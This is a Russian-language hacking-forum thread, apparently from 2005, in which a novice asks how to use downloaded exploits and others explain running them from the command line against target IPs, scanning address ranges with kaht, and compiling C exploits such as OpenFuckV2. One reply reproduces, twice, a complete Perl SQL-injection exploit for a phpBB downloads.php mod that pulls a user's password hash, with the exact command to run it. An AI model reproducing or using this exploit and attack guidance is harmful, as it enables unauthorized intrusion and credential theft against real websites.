Вот слил я сплойт-екзешник.
Что с ним делать-то? Кака прога не запускается. Через ДОС чтоли?
Нихера не понимаю...
Что с ним делать-то? Кака прога не запускается. Через ДОС чтоли?
Нихера не понимаю...
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Как сплойты юзать?
- Автор темы eRweB
- Дата начала
- Статус
Большенство ксплойтов цмдешные...как юзать!под каждую уязвимость есть ксплойт...узнаёшь уязвимость ,ищешь к ней ксплойт,и юзаешь...Xspider тебе в помощь...7-ой ещё и ссылки к ксплойтам даёт...
- Автор темы
- Добавить закладку
- #3
Я вот слил сплойт-то, тока вот вся проблема в том что при их запуске на секкунду вылезает черный экран и все закрывается.
каков результат? чтож делать то надо? Как их включить...
каков результат? чтож делать то надо? Как их включить...
Я кое чего юзал. Эксплоиты бывают разные. Большинство для командной строки. Вызываешь CMD и запускаешь эксплоит. Он скорее всего выдаст тебе список параметров, которые необходимо задавать. Далее все это дело указываешь и вперед. Только из попыток 20 одна удасться. Большинство бесплатных эксплоитов - вчерашний день. Толко ламерков вскрыть можно. Приватные эксплоиты стоят денег или в обмен чего-нибудь. Но это еще и найти нужно с кем и чем рассчитаться.
eRweB
Нажми на пуск,выбери "Выполнить..." и введи cmd (командная строка)
Там напиши путь к эксплоиту.И как уже сказал Ar3s вылезут возможности эксплоита. Дальше разберёшся сам...могу дать мануал по добычи инета)
В примере как раз используется эксплоит,заодно и потренируешся... B)
Нажми на пуск,выбери "Выполнить..." и введи cmd (командная строка)
Там напиши путь к эксплоиту.И как уже сказал Ar3s вылезут возможности эксплоита. Дальше разберёшся сам...могу дать мануал по добычи инета)
В примере как раз используется эксплоит,заодно и потренируешся... B)
Кинь в сплойты про добычу инета.
Только вот я попробовал. путь к файлу тяжело прописывать...
Запутался я окончательно....
Только вот я попробовал. путь к файлу тяжело прописывать...
Запутался я окончательно....
1) Компилируешь
2) Открываешь командную строку, прописываешь туда сплоит
3) Указываешь IP адрес атакуемого сервера
(4) Если сплоит биндит шелл, то ставишь порт шелла
4) Указываешь параметры -x для того или иного действия
5)нажимаешь "enter", ждешь
2) Открываешь командную строку, прописываешь туда сплоит
3) Указываешь IP адрес атакуемого сервера
(4) Если сплоит биндит шелл, то ставишь порт шелла
4) Указываешь параметры -x для того или иного действия
5)нажимаешь "enter", ждешь
А вот вопрос интересует, вот на большенстве хак-сайтов есть уймы сплоитов, все они имеют расширение .С . Так вот хотел спросить тоесть нужно взять всё там записанное и вставить в компилятор?? Тогда, чем посоветуете компилить?
Для каждого сплойта разные компиляторы. Я тоже врубиться долго не мог. Иногда в комментах к сплойту пишут чем лучше компилить. Там даже типа некоторые сплойты и не включаются после компиляции не подходящим компиллером.
Чтоб уберечь свой сплоит от попадания в массы всякого рода ламо.
Ну вобщем правильно. Большинство Сишных эксплойтосв можно скомпилить при помощи lcc-win32. C++ эксплойты можно компилить Борландским командно-строковым компилятором.
Я скажу так: во-первых, каждый эксплоит действительно пишется под разные компилы. Во-вторых, авторы иногда преднамеренно допускают ошибки, не знаю зачем. Просто для компилирования очень желательно знать Си (основной язык эксплоитов) и уметь модифицировать эксплоит под свои нужды...
Ну да, по большому счету ты прав. Иначе бы каждый второй брал, качал компил, компилил эксплоит и хакал всех подряд... :lol:
Рассказываю....
1. Компилировать сишные сплойты можно разными компиляторами для этого языка, я использую lcc-win32 и gcc .
2. Ошибки допускаются авторами преднамеренно, дабы убереч интерне от хаосного взлома ламеров-полудурков. Человек, хоть немного знающему C/C++
не составит особого труда, чтоб проследить на каком этапе вознивает ошибка, найти в её в коде и исправить.
3. Больштнство сплойтов, работающих из командной строки следует запускать следующим образом: пуск> выполнить> "C:\sploit.exe ключь/параметр запуска".
Например по этому принципу работает всем известный kaht, в строке выполнить пишем путь и параметры: "C:\kaht.exe 80.65.142.1 80.65.142.255 300". Мы указываем kaht'у какой диапазон ему сканировать, в нашем случае это 80.65.142.1/255.
Как правило ключи/парамерты сплойта даются в хелпе к нету, либо на сайте откуда ты качал этот сплойт.
1. Компилировать сишные сплойты можно разными компиляторами для этого языка, я использую lcc-win32 и gcc .
2. Ошибки допускаются авторами преднамеренно, дабы убереч интерне от хаосного взлома ламеров-полудурков. Человек, хоть немного знающему C/C++
не составит особого труда, чтоб проследить на каком этапе вознивает ошибка, найти в её в коде и исправить.
3. Больштнство сплойтов, работающих из командной строки следует запускать следующим образом: пуск> выполнить> "C:\sploit.exe ключь/параметр запуска".
Например по этому принципу работает всем известный kaht, в строке выполнить пишем путь и параметры: "C:\kaht.exe 80.65.142.1 80.65.142.255 300". Мы указываем kaht'у какой диапазон ему сканировать, в нашем случае это 80.65.142.1/255.
Как правило ключи/парамерты сплойта даются в хелпе к нету, либо на сайте откуда ты качал этот сплойт.
Wo0F
В целом ты обобщил все, о чем здесь базарили долгое время.
Добавлено [time]1113673880[/time]
Народ, выкладывайте здесь, кто может, ссылки на компиляторы, чтоб остальным не искать!
В целом ты обобщил все, о чем здесь базарили долгое время.
Добавлено [time]1113673880[/time]
Народ, выкладывайте здесь, кто может, ссылки на компиляторы, чтоб остальным не искать!
Это вы все про винду...))
Вот как это делается в linux
Например возьмем недавний сплоит для phpBB. Уяз был найден в модуле download.
Вот эксплоит:
#!/usr/bin/perl -w
use IO::Socket;
## Example:
## C:\>phpbb.pl www.site.com /phpBB2/ 2
##
## downloads.php mod in phpBB <= 2.0.13
## **********************************
## [~] Connecting...
## [ + ] Connected!
## [~] Sending Data...
## [~] Data Sent, Waiting for response...
## [ + ] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " phpBB <=2.0.13 'downloads.php' Mod\n";
print " Bug found by Axl And CereBrums\n";
print " Coded by CereBrums // 2/4/2005\n";
print " Usage: phpbb.pl <site> <folder> <user_id>\n";
print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$take = 0;
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n downloads.php mod in phpBB <= 2.0.13\n";
print " **********************************\n";
print " [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print " [ + ] Connected\n";
print " [~] Sending Data...\n";
$path = "http://$server/";
$path .= "/$folder/";
$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";
print " [~] Data Sent, Waiting for response...\n";
while ($answer = <$socket>)
{
if ($take == 1) {
$pass = substr($answer,51,32);
print " [ + ] MD5 Hash for user with id=$user_id is: $pass\n";
$success = 1;
$take = 0;
}
$found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
if ( $found > -1 ) {
$take = 1;
}
}
if ($success==0) {print " [ - ] Exploit failed\n";}
## EOF ##
# milw0rm.com [2005-04-02]
Смотрим на каком програмном языке написан эксплоит. Делаем вывод что это Perl.
Создаем текстовый файл куда загоняем експлоит и обзываем этот файл exploit.pl
Всё теперь запускаем командную строку и прописываем команду
perl -w phpbb.pl www.site.com /phpBB2/ 2
Эксплоиты на языке C (также смотрим что за язык и придаем текстовому файлу расширение exploit.c) компилятся следующим образом
cc OpenFuckV2.c -o openssl
где сс это команда для компиляции; OpenFuckV2.c файл с эксплоитом; -o команда; openssl имя для запуска эксплоита из командной строки.
В итоге набираем в командной строке ./openssl и цель умирает)))
Вот как это делается в linux
Например возьмем недавний сплоит для phpBB. Уяз был найден в модуле download.
Вот эксплоит:
#!/usr/bin/perl -w
use IO::Socket;
## Example:
## C:\>phpbb.pl www.site.com /phpBB2/ 2
##
## downloads.php mod in phpBB <= 2.0.13
## **********************************
## [~] Connecting...
## [ + ] Connected!
## [~] Sending Data...
## [~] Data Sent, Waiting for response...
## [ + ] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " phpBB <=2.0.13 'downloads.php' Mod\n";
print " Bug found by Axl And CereBrums\n";
print " Coded by CereBrums // 2/4/2005\n";
print " Usage: phpbb.pl <site> <folder> <user_id>\n";
print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$take = 0;
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n downloads.php mod in phpBB <= 2.0.13\n";
print " **********************************\n";
print " [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print " [ + ] Connected\n";
print " [~] Sending Data...\n";
$path = "http://$server/";
$path .= "/$folder/";
$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";
print " [~] Data Sent, Waiting for response...\n";
while ($answer = <$socket>)
{
if ($take == 1) {
$pass = substr($answer,51,32);
print " [ + ] MD5 Hash for user with id=$user_id is: $pass\n";
$success = 1;
$take = 0;
}
$found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
if ( $found > -1 ) {
$take = 1;
}
}
if ($success==0) {print " [ - ] Exploit failed\n";}
## EOF ##
# milw0rm.com [2005-04-02]
Смотрим на каком програмном языке написан эксплоит. Делаем вывод что это Perl.
Создаем текстовый файл куда загоняем експлоит и обзываем этот файл exploit.pl
Всё теперь запускаем командную строку и прописываем команду
perl -w phpbb.pl www.site.com /phpBB2/ 2
Эксплоиты на языке C (также смотрим что за язык и придаем текстовому файлу расширение exploit.c) компилятся следующим образом
cc OpenFuckV2.c -o openssl
где сс это команда для компиляции; OpenFuckV2.c файл с эксплоитом; -o команда; openssl имя для запуска эксплоита из командной строки.
В итоге набираем в командной строке ./openssl и цель умирает)))
Ну если среди вас найдется человек, которого эти компилы не устраивает, то вот вам - Borland C++ 3.11.
Прямой ссылки не нашел, т.к. ее вроде и нету...
Прямой ссылки не нашел, т.к. ее вроде и нету...
Вообще авторы иногда указывают каким компилятором лучше компиллить. Я обычно использую gcc, для меня он THE BEST
Полагаю, что немаловажным окажется тот факт, что не все сплоиты можно просто так взять и скомпилировать. Я готов отдать руку на отсечение, что большинство людей спрашивающих что такое эксплоит не имеют понятия про *nix - овые системы. Поэтому важно уметь отличать эксплоиты которые должны компилироваться под виндой и те которые нужно компилить в никсах.
Что такое *NIX - лучше не спрашивайте. Просто почитайте статьи про Unix, Linux, FreeBSD и т.д. :rtfm:ease:
Добавлено [time]1113829003[/time]
Замечу еще. Если не хотите гемороя. зайте уже собранные готовые EXE-шники. Они обычно гораздо проще в обращении. ПРИМЕР - KAHT!!!!
Что такое *NIX - лучше не спрашивайте. Просто почитайте статьи про Unix, Linux, FreeBSD и т.д. :rtfm:
ease:Добавлено [time]1113829003[/time]
Замечу еще. Если не хотите гемороя. зайте уже собранные готовые EXE-шники. Они обычно гораздо проще в обращении. ПРИМЕР - KAHT!!!!
- Статус